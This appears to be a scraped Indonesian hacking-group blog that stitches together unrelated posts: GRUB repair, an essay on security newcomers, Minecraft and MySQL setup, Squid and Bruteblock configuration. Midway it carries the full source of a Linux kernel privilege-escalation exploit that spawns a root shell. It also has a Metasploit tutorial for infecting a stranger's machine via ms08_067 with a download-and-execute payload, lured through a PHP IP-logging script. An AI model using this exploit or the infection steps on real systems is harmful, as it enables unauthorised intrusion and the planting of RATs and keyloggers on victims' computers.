English version : > Reinstalling Grub Boot Loader without reinstalling Linux

Diposkan oleh oz family Saturday, January 15, 2011

Sometimes you may need to reinstall Windows on your computer.
If you have a dual boot windows / linux, the windows will reinstall the original MBR (from windows) and Grub will be uninstalled.

This tutorial explains how to reinstall grub without reinstalling linux.
To do this, you need to bring your live Linux installation CD (like Ubuntu).

Boot from the CD and choose the "Start or Install Ubuntu" option.
Open a Terminal ( Applications >> Accessories >> Terminal ), and type:

sudo grub

then type:
find /boot/grub/stage1
so Grub can automatically search on what partition Linux is installed.
The answer is obtained in the form:
hd(X,Y)

where X represents the number of the hard drive and Y the partition number.

You must specify at what is the linux partition, to do this type:
root (hdX,Y)
example: root(hd0,2)

now to install grub you have only to type:
setup (hdX)
example: setup (hd0)
grub now is reinstalled, to quit grub type:
quit
then restart your computer. 

Terkait dengan "regenerasi" yang merupakan salah satu misi yang di canangkan echo di 2009 pada majalah elektroniknya yaitu ezine, maka gw secara pribadi dan terbuka sengaja menulis mengenai hal ini, tujuannya untuk menjadi lecutan bagi gw pribadi, dan siapapun yang merasa terlecut nantinya :P

IT sekuriti di Indonesia bisa dikatakan mengalami masa kemundurannya saat ini, bukan di lihat dari segi kuantitas tetapi lihatlah dari segi kualitas, bayangkan dengan banyaknya perusahaan sekuriti, badan pendidikan sertifikasi sekuriti, publikasi dan referensiyang tersebar bebas serta teknologi yang semakin canggih tetapi belum cukup membuat gebrakan-gebrakan baru di dunia sekuriti Indonesia. Tanyakanlah pada generasi terdahulu, seberapa sulit jalan yang mereka lalui, seberapa lama waktu dan jenjang yang harus mereka lalui untuk memberikan jaman keemasan dunia IT sekuriti di Indonesia, meskipun dengan jumlah yang sedikit dari segi kuantitas.

Adapun menurut gw, berikut adalah 7 jenis sifat dari para pendatang baru (nantinya akan disebut mereka) yang akan membuat mereka tetap berada di tempat walau seberapa besar usaha, uang, serta "bacotan" telah mereka gembar-gemborkan, dan pastinya ini juga yang membuat Dunia IT sekuriti di Indonesia mengalami kemunduran.

1. Tidak adanya motivasi asli

Lucunya apabila diperhatikan secara seksama kemunculan dan motivasi mereka persis bunglon, serba cepat berubah, hari ini ingin di sebut ini, besok mereka mengaku itu. Hal ini terjadi dikarenakan tidak adanya motivasi ataupun keinginan yang mendasari pembelajaran mereka. Kondisi seperti ini secara global sudah sering kita kenal dengan sebutan "krisis identitas", yang wajar di temui saat awal-awal memulai sesuatu (kita semua mengalami itu), tetapi permasalahan muncul karena sampai bertahun-tahun mereka tetaplah mengalami krisis identitas, sampai akhirnya "menyampah" dimana-mana :)

2. Rakus Publisitas dan Money Oriented

Seperti kalau kita kutip dari tulisan crazy consuelo dalam sebuah artikel bertajuk new hacking manifesto dalam salah satu issue yang di rilis phrackbecause I do this out of love -- you do it for money.. Umumnya para pendatang baru sangat amat rakus dengan ketenaran dan uang, di pikiran mereka adalah bagaimana secepatnya menjadi terkenal dan mendapat uang darinya, terserah apakah dengan publikasi sembarangan ke berbagai media massa dan tentunya bagi media massa akan sangat amat menguntungkan, tidak perduli dengan membodohi orang lain dibumbui janji-janji palsu dan pemujian diri sendiri yang sangat amat berlebihan, atau dengan melakukan "vandals" ke berbagai situs tanpa alasan yang jelas... Hey, itu berbeda dengan "cyber war".

3. Skill yang minim plus kemalasan yang besar

Sebagaimana pendatang baru, kemampuan mereka sangatlah minim. "Lack of skill" adalah hal yang lumrah bagi para pemula ditambah luasnya bidang ilmu komputer yang ada kala ini, tetapi yang menjadi permasalahan adalah kemalasan. Tidak adanya motivasi dan kerakusanpublisitas membutakan mereka untuk melompat jauh keatas tanpa mau melalui pijakan-pijakan tangga terbawah yang seharusnya merupakan pondasi terpenting.

Sudah dari 2004 gw menulis artikel "F.A.Q for NEWBIES Version 1.0" yang merupakan rangkuman dari berbagai sumber, dan gw harap sedikit banyak bisa menjadi acuan bagi yang mau memulai walau sangat jauh dari sempurna. Tetapi anehnya berkali-kali email yang mampir baik ke mailbox pribadi, pertanyaan di milis juga di hampiri dengan pertanyaan "bagaimana kami memulainya".

4. NATO (No Action Talk Only)

Satu hal yang pasti untuk membuktikan ini, tanyakan pada mereka 1 hal yang hanya membutuhkan jawaban pasti/detil/teknis/poc, maka pastinya mereka akan membuat anda pusing tujuh keliling dengan cerita-cerita tidak pasti dan hampir pasti tidak akan menjawab pertanyaan anda.

Minimnya kemampuan teknis dan konsep dasar membuat mereka kesulitan menjawab/memecahkan berbagai permasalahan, umumnya mereka akan senang mengalihkan atau melemparkan pertanyaan tersebut, dan sedihnya lagi sangat sulit bagi mereka untuk mengakui ketidaktahuan mereka dan mulai belajar, belajar dan belajar.

5. Generasi Instant 

Seperti halnya mie instan yang bisa disajikan dengan cepat dan sekejap mata, serta tanggapan public yang sangat memanjakan dengan berbagai tawaran kursus instan, buku-buku yang menyajikan janji-janji instan, melengkapi generasi instan ini, mereka tidak mau perduli dengan proses, mereka hanya ingin secara cepat berada di atas, dan layaknya semua yang instant, apapun itu, maka tidak akan bertahan lama.

6. Terputusnya link

Para pendatang baru umumnya tidak menghargai para pendahulunya, susah sekali memberikan "credit" kepada orang-orang yang telah berjasa bagi mereka, sebagai contoh credit untuk referensi, yang umumnya di klaim sebagai milik pribadi apabila di publikasikan ulang oleh mereka. sifat inilah yang membuat mereka tidak berkembang, karena secara pasti akan di jauhi para pendahulu yang sejatinya membimbing mereka, bahkan kemungkinan terburuk akan menimbulkan konflik, baik internal bahkan meluas.

7. Terlalu Berapi-api dan Sangat amat mudah Putus Asa

Layaknya kata pepatah "air beriak tanda tak dalam" dan "tong kosong nyaring bunyinya" memang terbukti bahwa banyak para pendatang baru yang terkadang berapi-api dalam mengemukakan konsep (dan sedihnya lagi terkadang bukan temuannya) yang apabila konsep tersebut di koreksi (misal: bertentangan dengan dasar keilmuan), akan membuat mereka marah bahkan terkadang berputus asa.

Dan itulah 7 hal yang menurut gw patut untuk di jauhi apabila ingin mulai mendalami IT sekuriti dan kembali memajukan IT khususnya dunia Sekuriti di Indonesia ini. Mudah-mudahan tulisan yang lebih merupakan keprihatinan gw pribadi ini dapat memberikan manfaat bagi diri gw sendiri, serta proses regenerasi di dunia IT sekuriti meskipun sedikit.
SimakBaca secara fonetik

Reset password ubuntu 10.10 ala oz

Diposkan oleh oz family

Assalamualaikum war, wab,

Kemaren ada kasus,, temen lupa password sama username ubuntunya,,

padahal itu ubuntu baru diinstal, yah,, kayaknya orangnya udah pikun dech,,cckck

oke langsung aja ya,,

pertama restart ubuntunya,, nah kan ada muncul grub loader itu,, pilih aja


# Ubuntu, with Linux 2.6.xxx-generic (recovery mode) 





oke nati kita akan dibawa ke recovery mode ubuntunya,,,


nah disitu kita scrool kebawah,, paling ujung pilih


# root Drop to root shell prompt







enter aja dah sobat o2nri2...


nah nanti sobat o2nri2 akan dibawa ke rppt directory ubuntu,,,


hmmm,,, nice inilah intinya,,


pada prompt tersebut ketikan 


cd /home 


kita kan menuju directory homenya,, next type


# dir


untuk menampilkan user yang ada ,, well di sample ini muncul "lab"


jelasnya  lihat gambar oke////





Setelah mengetahui nama user yang hendak direset passwordnya, silahkan kembali ke root 


direktori dengan cara mengetik "cd" pada console lalu tekan enter. Sekarang saatnya memberi 


perintah untuk penggantian password user. Ketik "passwd nama_user" lalu tekan enter, silahkan 


sesuaikan "user_name" dengan nama user pada komputer Anda. Dalam contoh ini kami mengetik 


"passwd lab" sebab user yang akan kami reset passwordnya bernama "lab"





Pada "Enter new UNIX password:" silahkan ketik password yang anda inginkan lalu tekan enter.


Ulangi lagi dengan memasukkan password yang sama pada "Retype new UNIX password:" lalu 


tekan enter,, teret,,,berhasil dech,, lihat gambarnya dulu





passwd: password updated successfully


nah mncul pesan succesfully kan,,


oke dah itu dia special edition for ubuntu 10.10 recovery password,,


eits ini cara singkat,, tapi kalo grub yang kita setting itu loadingnya 0 s,, wah


hancur dah,, yang itu mesti pake live dvd/usb itu,,,


tapi tenang aja,, oke ,, semuanya pasti bisa kita lakuin,, kalo kita terus berjuang,,


hehehe,, go o2nri2 oke

/*
 * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)
 * by Joe Sylve
 * @jtsylve on twitter
 *
 * Released: Jan 7, 2011
 *
 * Based on the bug found by Dan Rosenberg (@djrbliss)
 * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/
 * 
 * Usage:
 * gcc -w caps-to-root2.c -o caps-to-root2
 * sudo setcap cap_sys_admin+ep caps-to-root2
 * ./caps-to-root2
 *
 * Kernel Version >= 2.6.34 (untested on earlier versions)
 *
 * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit
 *
 * This exploit takes advantage of the same underflow as the original,
 * but takes a different approach.  Instead of underflowing into userspace
 * (which doesn't work on 64-bit systems and is a lot of work), I underflow 
 * to some static values inside of the kernel which are referenced as pointers
 * to userspace.  This method is pretty simple and seems to be reliable.
 */

#include <stdio.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Skeleton Structures of the Kernel Structures we're going to spoof
struct proto_ops_skel {
 int family;
 void  *buffer1[8];
 int (*ioctl)(void *, int, long);
 void  *buffer2[12];
};

struct phonet_protocol_skel {
 void *ops;
 void *prot;
 int sock_type; 
};


#ifdef __x86_64__ 

#define SYM_NAME "local_port_range"
#define SYM_ADDRESS 0x0000007f00000040
#define SYM_OFFSET 0x0

typedef int (* _commit_creds)(unsigned long cred);
typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);

#else //32-bit

#define SYM_NAME "pn_proto"
#define SYM_ADDRESS 0x4e4f4850
#define SYM_OFFSET 0x90

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

#endif


_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int getroot(void * v, int i, long l)
{
 commit_creds(prepare_kernel_cred(0));
 return 0;      
}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 int ret;

 char command[512];

 sprintf(command, "grep \"%s\" /proc/kallsyms", name);

 f = popen(command, "r");

 while(ret != EOF) {
  ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);

  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }

  if (!strcmp(name, sname)) {

   fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
   pclose(f);
   return addr;
  }
 }

 pclose(f);
 return 0;
}

int main(int argc, char * argv[])
{

 int sock, proto;
 unsigned long proto_tab, low_kern_sym, pn_proto;
 void * map;

 /* Create a socket to load the module for symbol support */
 printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
 sock = socket(PF_PHONET, SOCK_DGRAM, 0);

 if(sock < 0) {
  if(errno == EPERM)
   printf("[*] You don't have CAP_SYS_ADMIN.\n");

  else
   printf("[*] Failed to open Phonet socket.\n");

  return -1;
 }

 close(sock);

 /* Resolve kernel symbols */
 printf("[*] Resolving kernel symbols...\n");

 proto_tab = get_kernel_sym("proto_tab");
 low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET;
 pn_proto =  get_kernel_sym("pn_proto");
 commit_creds = (void *) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred");

 if(!proto_tab || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 if (low_kern_sym >= proto_tab) {
  printf("[*] %s is mapped higher than prototab.  Can not underflow :-(.\n", SYM_NAME);
  return -1;
 }


 /* Map it */
 printf("[*] Preparing fake structures...\n");

 const struct proto_ops_skel fake_proto_ops2 = {
   .family  = AF_PHONET, 
   .ioctl  = &getroot,
 };  

 struct phonet_protocol_skel pps = {
   .ops = (void *) &fake_proto_ops2,
   .prot = (void *) pn_proto,
   .sock_type = SOCK_DGRAM,
 };

 printf("[*] Copying Structures.\n");

 map = mmap((void *) SYM_ADDRESS, 0x1000,
   PROT_READ | PROT_WRITE | PROT_EXEC,
   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

 if(map == MAP_FAILED) {
  printf("[*] Failed to map landing area.\n");
  perror("mmap");
  return -1;
 }

 
 memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps));

 // Calculate Underflow
 proto = -((proto_tab - low_kern_sym) / sizeof(void *));

 printf("[*] Underflowing with offset %d\n", proto);

 sock = socket(PF_PHONET, SOCK_DGRAM, proto);

 if(sock < 0) {
  printf("[*] Underflow failed :-(.\n");
  return -1;
 } 

 printf("[*] Elevating privlidges...\n");
 ioctl(sock, 0, NULL);


 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] This was a triumph... I'm making a note here, huge success.\n");
 execl("/bin/sh", "/bin/sh", NULL);

 close(sock);
 munmap(map, 0x1000);

 return 0;
}

Assaalamualaikum war,wab,

Baik disini kita akan sama-sama belajar bersama cara untuk melakukan setup server minecraft,, jika belum tahu soal minecraft sedikit dari saya minecraft itu permainan sandbox dengan grafik yang usang.
Ini sedang dalam alpha tapi itu masih sangat menyenangkan dan sangat adiktif,, seru abiz,,dah,, ok kota langsung aja ok..

Persyaratan:

# Sebuah mesin Linux [VPS / DEDICATED SERVER]
# Koneksi Internet
# Putty (Memungkinkan Anda untuk terhubung melalui SSH ke mesin Linux Anda


Sebelum kita mulai, saya ingin mengingatkan kalau ini untuk target yang kurang akrab dengan keluarga NIX*.
Baik kita masuk ke cara kerja yang sederhana ini
1) Login ke mesin Linux Anda, Segera yang dituju adalaha console:
input command:


Code:
# which java

Perintah tersebut untuk mengecek ada atau tidaknya java dalam PC kita

[Image: 2iu59g0.png]

(Pada mesin saya disini, tidak ada Java yang terinstal .. Jadi, mari kita bersiap untuk menginstall Java kita < jangan opera van java ya >)

a) Instalasi Java

Jalankan perintah ini: SenangHi
code:

Code:
# yum install java-1.6.0-OpenJDK

Ini akan menginstal Java 1.6.(versinya bisa kita ganti semau kita, namun disini saya memberikannya hanya sebagai contoh dari tutorial yang akan saya sharing dengan teman-teman, kalau pakai debian tinggal diganti saja yum dengan apt-get install ok..

Mari kita lakukan hal itu, nanti akan ada pertanyaan yang akan meminta Anda untuk memberikan hak akses atau izin kita untuk menginstal, hanya menjawab dengan "y" untuk ya, kalau kita tidak ingin meneruskannya "N" saja agar prossesnya dibatalkan.

b) Allright, java sudah terinstall di PC kita - mari kita bergegas untuk memeriksanya sekarang.

[Image: sqqhao.png]

Gunakan perintah which java kembali :

Code:
# which java


Baiklah, sekarang kita akan mencoba cari tahu dimana letak dari file java tersebut, yups,, teman-teman betul sekali lokasinya adalah pada > /usr/bin/java/.

Selanjutnya masih berlanjut dengan yang tadi,
gunakan code:

Code:
# /Usr/bin/java/ -versi


HMMmmm,,,,
sepertinya ada masalah mesin ini menyatakan kalau versi java saya adalah versi 1.4.2, Supaya tidak membuat bingung lanjutkan saja dengan java yang sudah terinstall tadi, dan kita mungkin akan menggunakan versi 1.6..huftttt

Ya kita butuh versi 1.6.

2) Baiklah, sekarang kita akan membuat direktori hanya untuk Minecraft.
code:

Code:
# mkdir minecraft

[Image: 546dq8.png]

3) Sekarang mari kita jump kedalam direktori yang baru dibuat minecraft;
code:

Code:
# cd minecraft


[Image: 330yd68.png]

4) Sekarang mari kita download file jar. Untuk Minecraft.
code:

Code:
# wget http://minecraft.net/download/minecraft_server.jar

[Image: 214zc3n.png]

5) Sekarang yang harus kita lakukan adalah menjalankan server.
code:

[code]
# java -Xmx1024M -Xms1024M -jar minecraft_server.jar nogui
[/code

6) Anda sekarang akan melihat layar ini: Bigsmile

[Image: 2hx9bhx.png]

and the top:
[Image: 2m3qwq9.png]








eits,,udah pada punya VPS belom ????


hehehe : original posted by Rizky Ariestiyansyah

7 Langkah remote MySQL database server : Liyan oz

Diposkan oleh oz family Tuesday, January 11, 2011

Assalamualaikum war.wab,,,
kali ini Liyan bakal coba bahas masalh remote2an,,,
remote ???? main RC yuk wuakakaka
ah,, males ne ngelantur,, ok langsung aja disini kita akan sedikit capek karena bermain dengan database server MySQL
hmmm,,, lantas mainnya kaya gmana ??? gini,,, saking sibuknya seorang siswa IT pasti lah akan merasa yang namanya capek,, nah,, untuk menghindari itu ada solusinya,,,<apaan tu ?> nah biar kita gak capek mikirain databse server kita dirumah,, kita buat aja remote access MySQL database server,,, wuakakkaka kerennya diriku,,
ah palinagn lama pasti,,, ye,,kagak,,
ne Liyan kasih solusinya 7 langkah remote MySQL database server...
check yuk......

Langkah # 1: Menggunakan SSH Login (jika server berada di luar pusat data Anda)

Pertama, login lewat ssh ke server database MySQL jauh:

Code:
ssh Liyan@mysql.nixcraft.i

Langkah # 2: Edit File my.cnf

Setelah terhubung anda perlu mengedit konfigurasi server MySQL my.cnf file menggunakan editor teks seperti vi.(gw banget ne wkwkwkwkwk)

Jika teman2 menggunakan Debian (yang saya gunakan adalah Blankon ombilin 6.0 hasil remastering sendiri) berkas Linux terletak di /etc/ my.cnf lokasi mysql
Jika Anda menggunakan Red Hat Linux / Fedora / Centos berkas Linux (ufah lama gak make) terletak di / / my.cnf lokasi dll
Jika Anda menggunakan FreeBSD (ne yang Liyan suka) anda harus menciptakan file / var / db / mysql / my.cnf
Edit / etc / my.cnf, jalankan:

Code:
# vi /etc/my.cnf

Langkah # 3: Setelah file dibuka, cari baris yang berbunyi sebagai berikut

Code:
[Mysqld]

Membuat garis skip yakin-networking adalah komentar (atau menghapus baris) dan tambahkan baris berikut

Code:
bind-address = IP-SERVER-BROTHER

Misalnya, jika MySQL server anda punya IP 65.55.55.2 maka seluruh blok harus terlihat seperti sebagai berikut:

Code:
[mysqld]
user              = mysql
pid-file           = /var/run/mysqld/mysqld.pid
socket            = /var/run/mysqld/mysqld.sock
port                = 3306
basedir            = /usr
datadir             = /var/lib/mysql
tmpdir              = /tmp
language          = /usr/share/mysql/English
bind-address     = 65.55.55.2
# skip-networking
....
..
....

Dimana,
bind-address: alamat IP untuk mengikat.
skip-networking: skip tanpa mendengarkan koneksi TCP / IP sama sekali. Semua interaksi dengan mysqld harus dilakukan melalui soket Unix. Pilihan ini sangat dianjurkan untuk sistem yang hanya permintaan lokal diperbolehkan. Karena sobat o2nri2 perlu untuk memungkinkan koneksi remote baris ini harus dihapus dari my.cnf atau menaruhnya di negara komentar.
Langkah # 4 Simpan dan Tutup file

Restart mysql server, masukkan:

Code:
# /etc/init.d/mysql restart

Langkah # 5 akses Grant untuk alamat IP remote

Menyambung ke server mysql:

Code:
$ mysql -u root -p mysql

Memberikan akses ke database baru

Jika Anda ingin menambahkan sebuah database baru bernama foo untuk bar pengguna dan remote IP 202.54.10.20 maka Anda perlu mengetikkan perintah berikut pada mysql> prompt:

Code:
mysql> CREATE DATABASE foo;
mysql> GRANT ALL ON foo.* TO bar@'202.54.10.20' IDENTIFIED BY 'PASSWORD';

Code:
mysql> CREATE DATABASE foo;
mysql> GRANT ALL ON foo.* TO bar@'202.54.10.20' IDENTIFIED BY 'PASSWORD';

Hmmm,,, muncul pertanyaan ne dari otak Liyan. lantas bagaimana kita bisa Berikan Akses Untuk Sebuah Database yang ada?
Mari kita berasumsi ok...nah disini kita selalu membuat sambungan dari jarak jauh tersebut,, sebut saja IPnya 202.54.10.20 untuk database disebut WebDb untuk webadmin pengguna, Untuk memberikan akses ke alamat IP jenis ini perintah berikut pada prompt mysql> untuk database yang ada, input:

Code:
mysql> update db set Host='202.54.10.20' where Db='webdb';
mysql> update user set Host='202.54.10.20' where user='webadmin';

Langkah # 5: Keluar dari MySQL

Ketik exit perintah untuk mysql logout:

Code:
mysql> exit

Langkah # 6: Buka port 3306

Anda perlu membuka port TCP 3306 menggunakan iptables atau firewall pf BSD.

Contoh iptables untuk membuka aturan firewall iptables Linux
Code:
/ Sbin / iptables-A INPUT-i eth0-p tcp - destination-port 3306-j ACCEPT

ATAU hanya mengijinkan koneksi remote dari server web Anda terletak di 10.5.1.3:

Code:
/ Sbin / iptables-A INPUT-i eth0-s 10.5.1.3-p tcp - destination-port 3306-j ACCEPT

atau hanya mengijinkan koneksi remote dari 192.168.1.0/24 lan subnet Anda:

Code:
/ Sbin / iptables-A INPUT-i eth0-s 192.168.1.0/24-p tcp - destination-port 3306-j ACCEPT

Akhirnya menyimpan semua aturan:

Code:
# service iptables save

Sampel FreeBSD / OpenBSD pf aturan (/ etc / pf.conf)

Code:
pass in on $ext_if proto tcp from any to any port 3306

ATAU membolehkan akses hanya dari web server Anda berlokasi di 10.5.1.3:

Code:
pass in on $ext_if proto tcp from 10.5.1.3 to any port 3306  flags S/SA synproxy state

Langkah # 7: Ujilah

Dari sistem remote desktop Anda atau ketik perintah berikut:
Code:
$ mysql -u webadmin –h 65.55.55.2 –p
Dimana,

-U webadmin: webadmin adalah username dari MYSQL
-H IP atau nama host: MySQL server 65.55.55.2 adalah alamat IP atau nama host (FQDN)
-P: Prompt untuk password
Anda juga dapat menggunakan telnet untuk terhubung ke port 3306 untuk tujuan pengujian:

Code:
$ telnet 65.55.55.2 3306
gimana ??? bener 7 langkah kan ???
huaamamamamma,,, ngantuk ne,, udah dulu ya,,,
see you...

thanks to :
# allah swt
# my mather
# junia astri damayanti < my lovely yang setia >
# all Devilzcoder member n crew
# el n4cko, aaezha, ramiaji, antitos, n all my friend,,,

DC >> Blocking Domain/Application : squid proxy

Diposkan oleh oz family Wednesday, January 5, 2011


Blocking Domain/Application With Squid Proxy
Quote:kadang kesel juga ngeliat aplikasi2 ga berguna didownload
otomatis di pc client kaya 4shareddesktop dkk, 
gimana sih cara ngakalinnya? biar aplikasi tersebu 
t di block dari jaringan kita, terus sama blocking
domain Facebook poker, tetapi domain utama ga ke block

1.buat file devilzc0deurl.acl yang isinya path path domain2 yg mau di block
Code:
###########################################
#  Filename : devilzc0deurl.acl
###########################################

http://apps.facebook.com/texas_holdem/

http://statics.poker.static.zynga.com/poker/


2. Bikin file devilzc0defile.acl pada direktori /etc/squid yang
berisi filetype atau file dengan nama tertentu yang di block
Code:
###########################################
#  Filename : devilzc0defile.acl
###########################################
4shared_Desktop_3.1.0.exe

3. Buka squid.conf dan tambahkan baris berikut

Code:
acl devilzc0deurl url_regex -i "/etc/squid/devilzc0deurl.acl"
acl devilzc0defile urlpath_regex -i "/etc/squid/devilzc0defile.acl"


terus tambahin baris ini sembelum allow client
Code:
http_access deny devilzc0deurl
http_access deny devilzc0defile

Infect IP using METASPLOIT

Diposkan oleh oz family Friday, December 31, 2010

waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut...

ni tutorial ngebahas tentang gimana cara nya kita nginfect ip seseorang lewat metasploit jadi dengan gitu kita memasang program , virus,worm,RAT,keylogger atau apa aja terserah anda,

ok lanjut

di sini kita membutuhkan dua tool yg mungkin kalian semua udah pada g asing lagi lah ama tool ini
yaitu
METASPLOIT
NMAP

hal yg paling pertama kita lakukan tentu saja mencari target
yah kalo target nya dalam jaringan lokal kalian bisa menggunakan berbagai tool ip scanner kan itu sih gampang, ,,
nah kalo pngen tau ip orang di internet gimana ?

nih cuman ngasih pencerahan dikit
kita bkin dlu suatu script php untuk menangkap ip adress dari pengunjung yg membuka script itu

nih script nya 

Code:
<?

$file = "ip.txt";

$ip = $_SERVER['REMOTE_ADDR'];

$handle = fopen($file, 'a'); 

fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");

fclose($handle);
?>
abis itu kalian upload di webhost gratisan terus suruh target buat buka tuh link

ok lanjut kalo dah dapet ip kita lanjut buka metasploit

1. sebelum nya kita harus membuat dulu database dengan cara
ketik db_create pada metasploit

2. lalu kta scan ip target menggunakan nmap dengan cara ketik nmap pada metasploit lalu ketik nmap -sT -sV target ip
telah scanning beres nanti kita akan mendapatkan beberapa informasi, bila di dalam nya ada informasi berkaitan dengan windows 2000,(xp sp1,sp2,sp3) berarti kita bisa menginfect ip tersebut tanpa masalah
3. dalam metasploit ketik use windows/smb/ms08_067_netapi
lalu ketik 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST target IP

nah setelah itu disini bagian terpenting nya program apa yg ingin kita infect ke ip(komputer) tersebut.
apa kah kita akan menginfeksikan suatu virus,worm,RAT,keylogger,atau apa saja terserah anda

kita ketik set url http://www.site.com/xxx.exe

dan akhir nya kita ketik exploit



Serangan bruteforce ke service ssh dan ftp memang bikin gondok. Hasil iseng ngebrowse membawa gw ketemu tools yang menarik dan lumayan mudah penggunaannya 

Bruteblock membuat sistem administrator untuk ngebloking serangan bruteforce yang mengarah ke service UNIX .

How this tools work ?

Dengan menganalisa sistem log kemudian menambahkan alamat IP penyerang ke ipfw2 tabel, tool ini dapat memblokir brute attacker.

Kemudian alamat IP secara otomatis akan didelete dari tabel tadi setelah kurun waktu tertentu yang udah ditetapin. Bruteblock juga memakai ekspresi reguler untuk parse log, yang memberikan fleksibilitas dalam mengoperasikannya. Sehingga tool ini bisa digunakan untuk hampir semua service jaringan.

How to install ? Just simple…follow this step
1. install melalui port :
#cd /usr/ports/security/bruteblock
#make install clean


2. Tambahkan baris berikut di /etc/rc.conf agar bruteblock bisa langsung running sewaktu boot
bruteblockd_enable=”YES”
bruteblockd_table=”1″

bruteblockd_flags=”-s 5″

3. Edit file /etc/syslog.conf

Ubah baris berikut :

auth.info;authpriv.info /var/log/auth.log

menjadi
auth.info;authpriv.info |exec /usr/local/sbin/bruteblock -f /usr/local/etc/bruteblock/ssh.conf

4. Restart Syslogd
#/etc/rc.d/syslogd restart

5. start aplikasi bruteblock dengan command :
#/usr/local/etc/rc.d/bruteblockd.sh start

6. Tambain setting di ipfw untuk memblock IP-IP yang di masukkan oleh bruteblock
#ipfw add 400 deny ip from me to table\(1\)
#ipfw add 410 deny ip from table\(1\) to me


7. kalo ente mau ngerubah setting bruteblock untuk setiap service yang dilindungi, misal gw kepengen ngubah setting untuk ssh di file /usr/local/etc/bruteblock/ssh.conf

perhatikan beberapa point – point di bawah ini

regexp = sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
regexp1 = sshd.*Failed password for (?:illegal user )?\S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})

# Number of failed login attempts within time before we block

max_count = 4
# Time in seconds in which all failed login attempts must occur

within_time = 60
# Time in seconds to block ip in firewall
# 10 minutes

reset_ip = 600# IPFW table number to add “bad” hosts

ipfw2_table_no = 1
lo bisa aja menerapkan untuk service yang lain , contohnya ftp. kita hanya perlu mengubah di bagianregexp.tinggal di disesuaikan aja dengan format log servicenya.
gampang kan ?…
di tunggu commentnya di mari ..


DOWNLOAD
http://zeestuff.wordpress.com/2010/11/06/tangkis-serangan-bruteforce-pada-freebsd-unix/#more-74

source : tecon-crew